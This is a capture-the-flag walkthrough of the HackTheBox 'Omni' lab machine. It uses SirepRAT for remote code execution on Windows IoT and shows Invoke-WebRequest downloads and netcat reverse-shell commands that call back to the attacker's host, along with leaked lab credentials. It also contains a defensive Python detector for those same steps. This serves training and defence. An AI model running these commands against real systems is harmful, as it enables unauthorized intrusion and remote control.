Omni HackTheBox WalkThrough


This is the Omni HackTheBox walkthrough. In this writeup I demonstrate step by step how I rooted the Omni HTB machine. Before starting, a few facts about this machine: its OS is not listed, so it is categorized as "other"; its maker rated it easy; and it has been assigned the IP address 10.10.10.204.

First of all, connect your local machine to the VPN so that you can reach the lab machines, and confirm connectivity by pinging the IP address 10.10.10.204. If all is well, start hacking.

As usual, I began by scanning the IP address to get a starting point. Nmap [a port scanner] gave the following result.

Scanning

$ nmap -sV -sC -O -oN omni_scan 10.10.10.204

[Image: Nmap port scan result]

Nmap revealed that ports 135 and 8080 are open: MSRPC is running on port 135 and an IIS web server on port 8080. Browsing to http://10.10.10.204:8080/ brings up a login prompt, like the one a Tomcat web server shows, and a message that says Windows Device Portal.

[Image: Windows Device Portal login screen]

Googling Windows Device Portal reveals that it is a web server through which you can manage and configure your IoT devices remotely using a web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.

Now that I knew which software was in use, I immediately googled Windows Device Portal exploit to look for public exploits against it. I found this article on the first page of the search results. It explains that the Windows IoT operating system is affected by an RCE vulnerability in which an attacker can abuse the Sirep/WPCon communications protocol to execute commands on the OS without dropping a payload onto it. For more information about the exploit and its usage, refer to this GitHub repository.

Now that we have an exploit, let us use it to confirm whether we actually have remote code execution.

Testing Exploit

$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git
$ cd SirepRAT/
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v

[Image: Remote code execution confirmed on the Omni machine]

We can clearly see that OS commands execute remotely. So, to get a reverse shell, I dropped a netcat binary into a world-writable folder on the Windows host and then ran a command to connect back to my machine. You can get a list of publicly writable folders from this repository.

Getting Shell

$ python3 -m http.server 80   # Start a Python web server locally to host the nc64.exe file
$ rlwrap nc -nvlp 4321        # Local listener for the reverse shell
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.86 4321 -e powershell.exe" --v   # 10.10.14.86 is our VPN address, as in the download command above

Note: if you download the binary into the C:\Windows\System32\spool\drivers\color\ directory, you may get an error saying that nc64.exe is being used by another program. To avoid this, use the C:\Windows\System32\spool\ directory instead and rename the binary from nc64.exe to net1.exe as part of the remote download, as in the commands above.

[Image: Reverse shell received from the Omni machine]

We got a shell. I confirmed it by running $env:UserName (I used $env because the whoami command is not present).

I tried to list the users in the C:\Users\ directory, but no user directories are present there. So I ran net user to list all the users on the box.

$ net user

[Image: Output of net user on the Omni machine]

We have two users, Administrator and app, but their profile directories are not in the default location. Maybe they are on another drive? Let us check. I used the Get-PSDrive PowerShell cmdlet to list all the drives on the Omni machine.

For more information about the Omni machine you can run the PowerShell cmdlet Get-ComputerInfo.

$ Get-PSDrive

[Image: Output of Get-PSDrive listing all drives]

Get-PSDrive shows that the Omni machine has three drives, namely C, D and U. I changed to the U drive and found the app and administrator profiles under U:\Users\. We can capture the user flag now.

$ type U:\Users\app\user.txt

[Image: Contents of user.txt]

It appears that the user flag is not plain text but an encrypted PowerShell credential object (the kind Export-CliXml produces), to prevent unauthorized access. I did not know how to decrypt it, so I googled PowerShell Password Decryption and found this appropriate link on the first page. According to that website, user.txt can be decrypted as follows.

$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt

$ $UserCreds.GetNetworkCredential().Password

When I tried to decrypt it, I got an error. This error is probably due to unauthorized access to the user.txt file: user.txt is owned by user app, and we are currently logged in as omni. More precisely, Export-CliXml protects the SecureString inside such a file with DPAPI under the exporting user's key, so only a session running as app on this host can import it. So somehow we have to log in with user app's credentials, but we do not have any yet. After some enumeration I found the directory C:\Program Files\WindowsPowerShell\Modules\PackageManagement\, which contains a hidden file named r.bat. Its contents can be read with

$ type 'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat'

[Image: Contents of r.bat]

From the above file I got some credentials: app : mesh5143 and administrator : _1nt3rn37ofTh1nGz.

Since we have a login panel at http://10.10.10.204:8080, let us use the credentials app : mesh5143 to log in as user app.

Login into Portal

[Image: Logged in to Windows Device Portal as user app]

We are successfully logged in. Windows Device Portal (WDP) lets us manage all the processes and run commands from a command prompt: we can execute our command from the Run command panel.

Since we have already dropped our netcat binary [renamed to net1.exe] into the directory C:\Windows\System32\spool\, we will use it to get a reverse connection to our local netcat listener. Because we are now logged in as user app, the reverse shell will run with app's privileges and we can decrypt the content of user.txt. So I ran the commands below to get a shell.

$ rlwrap nc -nvlp 2345 # Run it locally to get reverse connection

$ C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe # Run in the command prompt window of WDP. You may get an error like the one below, but you will find the command has executed.

[Image: Running the net1.exe command from the WDP command prompt as user app]
[Image: User shell received on the netcat listener]
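The binary drop and callback used here (and in the earlier SirepRAT step) leave a distinctive process-creation trail. As an added example that is not part of the original walkthrough, the Python below runs three detections over constructed Sysmon-style process events: an executable launched from the spool directory, a netcat-style "<ip> <port> -e <shell>" argument pattern, and a PowerShell download written into System32. The pipe-separated Image=|CommandLine=|User= record format and the sample events are assumptions.

```python
"""Detection sketch for the post-exploitation trail in this walkthrough: a
download into C:\\Windows\\System32, a binary launched from the spool directory,
and a netcat-style '<ip> <port> -e <shell>' callback.  Event format is assumed."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Executable image located under the print spooler directory (writable by all users).
SPOOL_DIR_RE = re.compile(r"\\windows\\system32\\spool\\", re.IGNORECASE)
# '<ipv4> <port> -e <program>': the classic netcat reverse-shell argument shape.
NC_REVERSE_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\s+-e\s+(\S+)", re.IGNORECASE)
# PowerShell download cradle writing straight into a System32 path.
DOWNLOAD_TO_SYS_RE = re.compile(r"invoke-webrequest.*-outfile\s+(c:\\windows\\system32\\\S+)", re.IGNORECASE)

@dataclass
class Event:
    image: str
    command_line: str
    user: str

def parse_event(line: str) -> Event:
    # Constructed 'Key=Value|Key=Value' process-creation record (Sysmon event 1 style).
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return Event(fields["Image"], fields["CommandLine"], fields["User"])

def analyse(line: str) -> List[str]:
    """Return the detection names that fire for one event (empty list if benign)."""
    ev = parse_event(line)
    findings = []
    if SPOOL_DIR_RE.search(ev.image):
        findings.append("exec-from-spool-dir")
    m = NC_REVERSE_RE.search(ev.command_line)
    if m:
        findings.append(f"netcat-style-reverse-shell:{m.group(1)}:{m.group(2)}->{m.group(3)}")
    m = DOWNLOAD_TO_SYS_RE.search(ev.command_line)
    if m:
        findings.append(f"download-into-system32:{m.group(1)}")
    return findings

def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(user, findings) for every event that triggers at least one detection."""
    return [(parse_event(l).user, analyse(l)) for l in lines if analyse(l)]

# Constructed sample events mirroring the walkthrough's commands, plus two benign ones.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\spool\net1.exe|CommandLine=C:\Windows\System32\spool\net1.exe 10.10.14.86 4321 -e powershell.exe|User=OMNI\omni",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Invoke-Webrequest -OutFile C:\Windows\System32\spool\net1.exe -Uri http://10.10.14.86/nc64.exe|User=OMNI\omni",
    r"Image=C:\Windows\System32\spoolsv.exe|CommandLine=C:\Windows\System32\spoolsv.exe|User=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c ipconfig|User=OMNI\app",
]

if __name__ == "__main__":
    for user, hits in scan(SAMPLE_EVENTS):
        print(user, hits)
```

The spooler service itself (spoolsv.exe) does not trip the path rule because the match requires a file inside the spool\ directory, which is the writable location the walkthrough relies on.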

Capture User Flag

$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt

$ $UserCreds.GetNetworkCredential().Password

[Image: User flag decrypted]

Privilege Escalation

We also have the administrator account credentials from the r.bat file. We just need to log out of the app account, log in as administrator, and follow the same steps we did with user app. To log out of the app account, close the browser window and clear your browsing history to remove the logged-in cookie. Then log in with the credentials administrator:_1nt3rn37ofTh1nGz and execute the same command you did with user app, changing the netcat listening port.

$ rlwrap nc -nvlp 3456

$ C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe

[Image: Running the net1.exe command from the WDP command prompt as administrator]

We got an administrative-privilege shell, so we have successfully escalated privileges to the admin user.

[Image: Administrator shell received on the netcat listener]

Capture Root Flag

# $UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt

# $UserCreds.GetNetworkCredential().Password

[Image: Root flag decrypted]

This was how I rooted Omni on HackTheBox. I learnt a lot from hunting this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. For any query or suggestion related to the walkthrough, feel free to contact us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/